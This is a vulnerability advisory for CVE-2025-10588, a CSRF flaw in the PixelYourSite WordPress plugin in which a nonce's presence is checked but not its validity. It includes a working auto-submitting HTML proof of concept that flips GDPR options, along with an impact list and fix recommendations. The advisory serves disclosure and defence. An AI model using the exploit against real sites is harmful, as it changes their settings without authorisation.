PixelYourSite (Free) is a widely used tracking and analytics integration plugin, active on 500k+ WordPress sites. It centralizes pixel/tag configuration for platforms like Meta and Google, and exposes consent-related toggles in its admin UI. During testing we identified CVE-2025-10588, a Cross-Site Request Forgery (CSRF) flaw that allows an attacker to trick a logged-in administrator into silently enabling GDPR AJAX mode and related consent integrations without a valid nonce verification. While the code checks the presence of _wpnonce and confirms that the victim has the manage_pys capability, it does not verify the nonce value before mutating options, allowing state change via cross-origin GET or POST.
| CVE | CVE-2025-10588 |
| Plugin Version | PixelYourSite <= 11.1.2 |
| Critical | High |
| All Time | 17 133 912 |
| Active installations | 500 000+ |
| Publicly Published | September 4, 2025 |
| Last Updated | September 4, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-10588 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pixelyoursite/pixelyoursite-1112-cross-site-request-forgery-to-gdpr-options-modification |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| September 4, 2025 | Plugin testing and vulnerability detection in the PixelYourSite – Your smart PIXEL (TAG) & API Manager have been completed |
| September 4, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| October 21, 2025 | Registered CVE-2025-10588 |
Discovery of the Vulnerability
The plugin’s administrative request handler, invoked on every /wp-admin/* load via admin_init, inspects the request for a _wpnonce field and pys[enable_gdpr_ajax]. If present—and if the user has manage_pys—it updates internal flags:
gdpr_ajax_enabledgdpr_cookie_law_info_integration_enabledconsent_magic_integration_enabled
Critically, the handler performs no nonce verification (wp_verify_nonce() / check_admin_referer()), accepting any_wpnonce string. Consequently, a malicious page can auto-submit a cross-origin request to /wp-admin/index.php or /wp-admin/admin.php?page=pixelyoursite including _wpnonce=<anything>&pys[enable_gdpr_ajax]=1, coercing the victim’s browser to flip these settings without interaction.
Understanding of CSRF attack’s
In WordPress, secure state changes require two pillars:
- Capability checks (e.g.,
current_user_can('manage_options')) to ensure the user is allowed to perform the action; and - Nonce verification (
check_admin_referer()/wp_verify_nonce()) to ensure the request originated from the site itself.
Missing either element enables CSRF. Numerous historic CVEs show that checking only capabilities but not the nonce is insufficient, because the administrator’s browser will happily send authenticated requests to attacker-controlled forms or iframes. CVE-2025-10588 fits this pattern exactly: nonce presence is checked, but not its validity, so an attacker can flip options as soon as an admin visits a crafted page.
Exploiting the CSRF Vulnerability
To exploit CVE-2025-10588, an attacker without any cookies:
POC:
<html> <body> <form action="http://127.0.0.1/wordpress/wp-admin/index.php"> <input type="hidden" name="_wpnonce" value="1" /> <input type="hidden" name="pys[enable_gdpr_ajax]" value="1" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>____
- Compliance drift: An attacker can change consent behavior, enabling AJAX-based collection routes that bypass expected user flows, causing GDPR/CCPA compliance misalignment.
- Operational side-effects: Admins may troubleshoot “mysterious” tracking behavior, waste time, or unintentionally ship configurations that violate internal policies.
- Chaining: If other toggles are wired similarly, an attacker could flip multiple settings to weaken defenses or prep subsequent social-engineering steps.
While no data exfiltration occurs directly, the unauthorized state change is material—particularly for regulated sites—because it alters how and when tracking executes.
Recommendations for Improved Security
For the plugin vendor (PixelYourSite):
- Verify nonces: Replace presence checks with
check_admin_referer( 'pys_settings' )(or equivalent) and require a matchingname="pys_settings_nonce"field. - Require POST: Process mutations only on POST, not GET; early-return on other methods.
- Scope changes to the settings screen: Perform updates only when on the plugin’s admin page and after explicit user action.
- UI confirmation: Consider a confirmation step or success notice tied to the verified nonce submission for defense-in-depth.
- Same-origin hardening: Ship headers (and document guidance) for
X-Frame-Options: SAMEORIGINand a CSP that reduces cross-origin form posts to admin endpoints.
For site owners/admins:
- Update to a patched version as soon as it’s available.
- Adopt cookie protections: Use
SameSite=Lax(orStrictwhere feasible) for auth cookies to reduce CSRF risk surface. - Limit simultaneous admin browsing: Avoid visiting untrusted sites while logged into WordPress.
- WAF rules: Temporarily block unexpected
pys[enable_gdpr_ajax]submissions to/wp-admin/outside the plugin’s settings POST.
By taking proactive measures to address CSRF vulnerabilities like CVE-2025-10588 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.